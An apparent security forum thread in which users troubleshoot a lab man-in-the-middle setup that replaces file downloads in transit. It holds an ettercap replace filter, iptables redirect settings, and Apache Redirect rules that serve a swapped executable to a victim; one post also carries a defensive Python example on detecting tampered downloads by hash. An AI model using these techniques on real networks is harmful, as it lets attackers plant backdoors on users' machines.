Thread: MITM attacks... replacing file downloads with your backdoor

  1. #1
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default MITM attacks... replacing file downloads with your backdoor

    lab setup, smb server running on 192.168.1.2... backtrack4 downloads file.exe from the server, this file contains nothing but 71 which equals x. I would like to swap the data on the fly with the use of a filter...
    Code:
    file.exe contains
    71717171717171717171717171...etc...
    the filter should sort through traffic on port 135 and once xxx is found it should be replaced with qqq
    Code:
    if (ip.proto == TCP && tcp.src == 135) {
          if (search(DATA.data, "xxx")) {
               replace("xxx", "qqq");
               msg("bytes replaced");
          }
    }
    I have made all kinds of attempts... I could make a video showing my attempts...

    I have transferred the file and dumped the traffic with wireshark for a template or data control...

    please give your ideas and thoughts...

  2. #2
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    I'd be more interested in knowing what is failing or not. What is tcpdump showing during file transfer (i.e. can you manually see the "xxx" data), can you replicate with two netcat instances doing a file transfer on the same port, etc.

    Most of that is geared towards ensuring your filtering is in place and operational.

    Then you should be looking to see if there is any need to decode what you are seeing within ettercap, and that's about as much troubleshooting as I can provide.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    I'm going to try out another lab setup which I think makes more sense... I'll focus on file transfers from firefox and an httpd-apache server, this server will be hosting a file called block.exe which is 84 bytes in size and only contains the hex value of 58 which is nothing but X's...

    here is a packet I captured... in plain text
    HTTP HTTP/1.1 200 OK (application/x-msdos-program)
    Code:
    HTTP/1.1 200 OK
    Date: Mon, 31 Aug 2009 22:45:42 GMT
    Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-bt0 with Suhosin-Patch
    Last-Modified: Mon, 31 Aug 2009 04:46:34 GMT
    ETag: "411bd-54-47268b7e13e80"
    Accept-Ranges: bytes
    Content-Length: 84
    Keep-Alive: timeout=15, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdos-program
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    and here is the same packet but in binary print
    Code:
    0000   00 1a 73 91 01 9c 00 1e 2a 51 10 8e 08 00 45 00  ..s.....*Q....E.
    0010   01 dc 93 4a 40 00 3f 06 d6 54 47 c5 c7 0b c0 a8  ...J@.?..TG.....
    0020   01 04 00 50 da fa dd ba 08 cc de 0c 5a 8a 80 18  ...P........Z...
    0030   00 6c 0b 16 00 00 01 01 08 0a 00 1e 9b 86 00 1e  .l..............
    0040   9b 84 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f  ..HTTP/1.1 200 O
    0050   4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 33 31  K..Date: Mon, 31
    0060   20 41 75 67 20 32 30 30 39 20 32 32 3a 34 35 3a   Aug 2009 22:45:
    0070   34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20  42 GMT..Server: 
    0080   41 70 61 63 68 65 2f 32 2e 32 2e 39 20 28 55 62  Apache/2.2.9 (Ub
    0090   75 6e 74 75 29 20 50 48 50 2f 35 2e 32 2e 36 2d  untu) PHP/5.2.6-
    00a0   62 74 30 20 77 69 74 68 20 53 75 68 6f 73 69 6e  bt0 with Suhosin
    00b0   2d 50 61 74 63 68 0d 0a 4c 61 73 74 2d 4d 6f 64  -Patch..Last-Mod
    00c0   69 66 69 65 64 3a 20 4d 6f 6e 2c 20 33 31 20 41  ified: Mon, 31 A
    00d0   75 67 20 32 30 30 39 20 30 34 3a 34 36 3a 33 34  ug 2009 04:46:34
    00e0   20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 34 31 31   GMT..ETag: "411
    00f0   62 64 2d 35 34 2d 34 37 32 36 38 62 37 65 31 33  bd-54-47268b7e13
    0100   65 38 30 22 0d 0a 41 63 63 65 70 74 2d 52 61 6e  e80"..Accept-Ran
    0110   67 65 73 3a 20 62 79 74 65 73 0d 0a 43 6f 6e 74  ges: bytes..Cont
    0120   65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 34 0d 0a  ent-Length: 84..
    0130   4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65  Keep-Alive: time
    0140   6f 75 74 3d 31 35 2c 20 6d 61 78 3d 31 30 30 0d  out=15, max=100.
    0150   0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65  .Connection: Kee
    0160   70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74  p-Alive..Content
    0170   2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69  -Type: applicati
    0180   6f 6e 2f 78 2d 6d 73 64 6f 73 2d 70 72 6f 67 72  on/x-msdos-progr
    0190   61 6d 0d 0a 0d 0a 58 58 58 58 58 58 58 58 58 58  am....XXXXXXXXXX
    01a0   58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    01b0   58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    01c0   58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    01d0   58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
    01e0   58 58 58 58 58 58 58 58 58 58                    XXXXXXXXXX
    Content-Type: application/x-msdos-program
    Content-Length: 84

    these 2 lines look very interesting to me...
    content length = X, you now know that the last X bytes of the packet are the data that needs to be altered...

    so, if these 2 strings are found then the swap needs to take place...
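
    Looking at post #3's Content-Length point from the defending side: this is an added example (mine, not code from the thread) that parses a response modelled on the captured one and shows that a same-length byte substitution in transit leaves Content-Length consistent, so only an out-of-band digest comparison of the download catches it. The sample response and the expected digest are constructed for the demonstration.

```python
import hashlib

# Constructed sample modelled on the Apache response captured in the thread:
# status line, headers, blank line, then an 84-byte body of 'X'.
ORIGINAL_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Length: 84\r\n"
    b"Content-Type: application/x-msdos-program\r\n"
    b"\r\n" + b"X" * 84
)
# The same response after an in-path, length-preserving substitution (constructed).
TAMPERED_RESPONSE = ORIGINAL_RESPONSE.replace(b"XXX", b"QQQ")

# Digest a publisher would list beside the download; computed here from the
# constructed original body, whereas a real check uses the published value.
EXPECTED_SHA256 = hashlib.sha256(b"X" * 84).hexdigest()


def parse_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (headers dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:  # skip the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return headers, body


def length_matches(raw: bytes) -> bool:
    """Weak check: does the body length equal the declared Content-Length?"""
    headers, body = parse_response(raw)
    return int(headers.get("content-length", "-1")) == len(body)


def digest_matches(raw: bytes, expected_hex: str) -> bool:
    """Strong check: does the body hash to the out-of-band published digest?"""
    _, body = parse_response(raw)
    return hashlib.sha256(body).hexdigest() == expected_hex


if __name__ == "__main__":
    for label, resp in (("original", ORIGINAL_RESPONSE), ("tampered", TAMPERED_RESPONSE)):
        print(label, "length ok:", length_matches(resp),
              "digest ok:", digest_matches(resp, EXPECTED_SHA256))
```

    Both responses pass the length check; only the digest check separates them, which is why a published hash or a signed download matters more than anything visible in the headers.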

  4. #4
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Check out the IronGeek's page on ettercap filters, it focuses quite well on HTTP manipulation.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  5. #5
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    @bigmac
    You could try this, it seems to work. Add these lines in your apache conf
    Redirect /files/somefile/ http://192.168.1.1/files/somefile/
    Redirect / http://somewebsite.com

    If the link to download a file is "somewebsite.com/files/somefile/3456.exe" it will grab the file off your server (rename it on your server to 3456.exe), otherwise it will go to the web site they are already viewing.

  6. #6
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    Right now, I just want to shoot my brains out, I just realized that all the testing I have done so far has been false because ettercap DOESN'T EVEN WORK

    I guess ettercap needs configuring these days

    echo 1 > /proc/sys/net/ipv4/ip_forward
    edit this file /etc/etter.conf
    Code:
    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    ettercap still is not working properly... the filter irongeek provides does not work (I have used it in the past and it worked just fine) the data is not being replaced... I have a collection of old filters I wrote that don't work... what's the deal...

  7. #7
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    Right now, I just want to shoot my brains out, I just realized that all the testing I have done so far has been false because ettercap DOESN'T EVEN WORK

    I guess ettercap needs configuring these days

    echo 1 > /proc/sys/net/ipv4/ip_forward
    edit this file /etc/etter.conf

    Code:
    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    ettercap still is not working properly... the filter irongeek provides does not work (I have used it in the past and it worked just fine) the data is not being replaced... I have a collection of old filters I wrote that don't work... what's the deal...

    Just use the apache redirect commands, works every time.
    I couldn't get ettercap to work anymore, use netsed, arpspoof and wireshark

  8. #8
    Junior Member IAMZOMBIE's Avatar
    Join Date
    Jan 2010
    Posts
    81

    Default

    My first thought was ngrep, but I'm not sure if it can do a replace. You might be able to rewrite the source. Might be a good start.

    Or maybe have a proxy server in-between your webserver and the internet and have all packets going out written to a temp file and then grep/replace and send back out every 5 seconds. It would create a large delay for the victim, but might work.
